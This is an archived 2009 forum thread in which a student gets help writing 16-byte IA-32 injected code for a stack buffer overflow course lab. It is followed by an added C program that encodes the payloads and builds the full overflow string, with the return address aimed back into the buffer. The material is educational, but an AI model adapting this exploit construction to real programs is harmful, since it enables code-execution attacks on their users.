Welcome to Valhalla Legends Archive.

[IA32 ASM] Buffer Overflow

Started by CrAzY, November 15, 2009, 04:25 PM


CrAzY

I need this to fit into 16 bytes.

   0:   ff 35 d0 8c 04 08       pushl  0x8048cd0
   6:   c7 05 c0 a1 04 08 57    movl   $0x1a24a357,0x804a1c0
   d:   a3 24 1a
  10:   c3                      ret


Might need more help too.

Tim

brew

Is that the exact assignment, to fit the equivalent of that code into one byte less?
I don't see smaller code happening.
<3 Zorm
Quote: [01:08:05 AM] <@Zorm> haha, me get pussy? don't kid yourself quik
Scio te esse, sed quid sumne? :P

CrAzY

It's supposed to be a buffer overflow. There are 12 available bytes in the buffer, then 4 more that can be used by overwriting %ebp, and then the next 4 are used for the return address of the beginning of the buffer, to run the exploit code.

Basically it's supposed to just set a global variable at memory address 0x804a1c0 to my cookie, which is $0x1a24a357. That cookie is static, but it is also stored at 0x804a1b0, if there is any other way you could see that being used.

The assignment explicitly states that the code for this should be exactly 16 bytes.

Edit:  If there is any way I could speak more directly to you it would be much appreciated.  The assignment is due in 2 hours and there are only 4 parts to it and I'm currently finished with 2, and close to the other 2.  Thanks either way though.

CrAzY

Update: I solved that one. One more to do.

"Your exploit code should set your cookie as the return value, restore any corrupted state, push the correct return location on the stack, and execute a ret instruction to really return to test."

Here's my guess?

   0:   68 b0 b5 ff bf          push   $0xbfffb5b0      # ebp of previous stack
   5:   b8 57 a3 24 1a          mov    $0x1a24a357,%eax # move cookie to return
   a:   c9                      leave                   # I got away with not having this in my last problem. Do I need it?
   b:   c3                      ret                     # hopefully return to the actual caller function :)


Any help would be nice =)

MyndFyre

How did you solve the first problem?
Quote: Every generation of humans believed it had all the answers it needed, except for a few mysteries they assumed would be solved at any moment. And they all believed their ancestors were simplistic and deluded. What are the odds that you are the first generation of humans who will understand reality?

After 3 years, it's on the horizon.  The new JinxBot, and BN#, the managed Battle.net Client library.

Quote from: chyea on January 16, 2009, 05:05 PM
You've just located global warming.

CrAzY

Quote from: MyndFyre on November 16, 2009, 01:45 AM
How did you solve the first problem?

Instead of "pushl 0x8048cd0", I did "pushl $0x8048cd0".

The result was 1 byte shorter, and it made the code work how it was supposed to, rather than pushing the value stored in that memory address.
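The two payloads from this thread, encoded from the IA-32 instruction bytes the posts quote and laid into the 12 + 4 + 4 frame described in the second post, as an added example in C. This is not code from the posts or from the assignment. It encodes the first payload both as originally posted (6-byte `pushl` with a memory operand, 17 bytes total) and with the `$` fix from the last post (16 bytes), the second payload exactly as guessed (12 bytes), and a fourth sequence that is my own assumption of how "restore any corrupted state" can be met within 16 bytes when the saved-%ebp slot is occupied by code: restore %ebp from an immediate instead of relying on `leave`. The buffer's own address (`BUF_ADDR`) and the return location inside test (`TEST_RET_ADDR`) are placeholders, since the page never gives them; read both from gdb before using the output.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout stated in the thread: 12-byte buffer, saved %ebp (4 bytes),
 * return address (4 bytes).  Code covers buffer + saved-%ebp slot (16 bytes);
 * the return address is pointed back at the start of the buffer. */
enum { BUF_SIZE = 12, EBP_SIZE = 4, RET_SIZE = 4,
       CODE_SIZE = BUF_SIZE + EBP_SIZE, PAYLOAD_SIZE = CODE_SIZE + RET_SIZE };

#define COOKIE      0x1a24a357u  /* cookie quoted in the thread */
#define GLOBAL_ADDR 0x0804a1c0u  /* global variable to set to the cookie */
#define RET_AFTER   0x08048cd0u  /* where the first payload returns */
#define SAVED_EBP   0xbfffb5b0u  /* caller's %ebp from the second post */
/* ASSUMPTIONS: neither value is given on the page; read both from gdb. */
#define BUF_ADDR      0xbfff0000u  /* address of the 12-byte buffer */
#define TEST_RET_ADDR 0x08048000u  /* return location inside test() */

static void le32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff;
}

/* IA-32 encodings (immediates/displacements little-endian):
 * 68 imm32 = push $imm32 (5)    ff 35 disp32 = pushl disp32, pushes *disp32 (6)
 * b8 imm32 = mov $imm32,%eax (5)    bd imm32 = mov $imm32,%ebp (5)
 * c7 05 disp32 imm32 = movl $imm32,disp32 (10)    c9 = leave    c3 = ret */
static size_t push_imm(uint8_t *p, uint32_t v) { p[0] = 0x68; le32(p + 1, v); return 5; }
static size_t push_mem(uint8_t *p, uint32_t a) { p[0] = 0xff; p[1] = 0x35; le32(p + 2, a); return 6; }
static size_t mov_eax(uint8_t *p, uint32_t v)  { p[0] = 0xb8; le32(p + 1, v); return 5; }
static size_t mov_ebp(uint8_t *p, uint32_t v)  { p[0] = 0xbd; le32(p + 1, v); return 5; }
static size_t movl_mem(uint8_t *p, uint32_t a, uint32_t v) {
    p[0] = 0xc7; p[1] = 0x05; le32(p + 2, a); le32(p + 6, v); return 10;
}
static size_t leave_(uint8_t *p) { p[0] = 0xc9; return 1; }
static size_t ret_(uint8_t *p)   { p[0] = 0xc3; return 1; }

/* First payload as originally posted (pushl with a memory operand): 17 bytes. */
size_t build_bang_wrong(uint8_t *c) {
    size_t n = push_mem(c, RET_AFTER);
    n += movl_mem(c + n, GLOBAL_ADDR, COOKIE);
    return n + ret_(c + n);
}

/* First payload with the fix from the last post (push $imm32): 16 bytes. */
size_t build_bang(uint8_t *c) {
    size_t n = push_imm(c, RET_AFTER);
    n += movl_mem(c + n, GLOBAL_ADDR, COOKIE);
    return n + ret_(c + n);
}

/* Second payload exactly as guessed in the thread: 12 bytes.  Its `leave`
 * uses whatever %ebp holds when the code runs; see popped_ebp() below. */
size_t build_boom_as_posted(uint8_t *c) {
    size_t n = push_imm(c, SAVED_EBP);
    n += mov_eax(c + n, COOKIE);
    n += leave_(c + n);
    return n + ret_(c + n);
}

/* ASSUMED variant: the saved-%ebp slot is occupied by code, so restore %ebp
 * from an immediate, set the return value, push the return location, ret.
 * 5 + 5 + 5 + 1 = 16 bytes, exactly the budget. */
size_t build_boom(uint8_t *c) {
    size_t n = mov_eax(c, COOKIE);
    n += mov_ebp(c + n, SAVED_EBP);
    n += push_imm(c + n, TEST_RET_ADDR);
    return n + ret_(c + n);
}

/* Lay code into the 20-byte overflow string: code, int3 (0xcc) padding up to
 * 16 bytes so a stray jump traps, then the return address = buffer start.
 * Returns 0 if the code does not fit the 16-byte budget. */
size_t frame_payload(uint8_t *out, const uint8_t *code, size_t code_len) {
    if (code_len > CODE_SIZE) return 0;
    memcpy(out, code, code_len);
    memset(out + code_len, 0xcc, CODE_SIZE - code_len);
    le32(out + CODE_SIZE, BUF_ADDR);
    return PAYLOAD_SIZE;
}

/* What getbuf's epilogue pops into %ebp before its ret lands on the code:
 * payload bytes 12..15, little-endian. */
uint32_t popped_ebp(const uint8_t *payload) {
    const uint8_t *p = payload + BUF_SIZE;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

int main(void) {
    uint8_t code[32], payload[PAYLOAD_SIZE];
    size_t (*builders[])(uint8_t *) = { build_bang, build_boom };
    for (int b = 0; b < 2; b++) {
        size_t n = frame_payload(payload, code, builders[b](code));
        for (size_t i = 0; i < n; i++) printf("%02x%c", payload[i], i + 1 < n ? ' ' : '\n');
        printf("  %%ebp after getbuf's ret: 0x%08x\n", (unsigned)popped_ebp(payload));
    }
    return 0;
}
```

The program prints the 20 hex bytes for each payload, ready for the lab's raw-input tool. `frame_payload` returning 0 for the 17-byte version is the "one byte too many" problem from the first post; `popped_ebp` shows why a `leave` in the second payload cannot restore the caller's frame on its own: getbuf's epilogue has already popped payload bytes 12..15 into %ebp (0xc31a24a3 for the fixed first payload) before the ret lands on the code, so anything that needs the caller's %ebp has to set it explicitly.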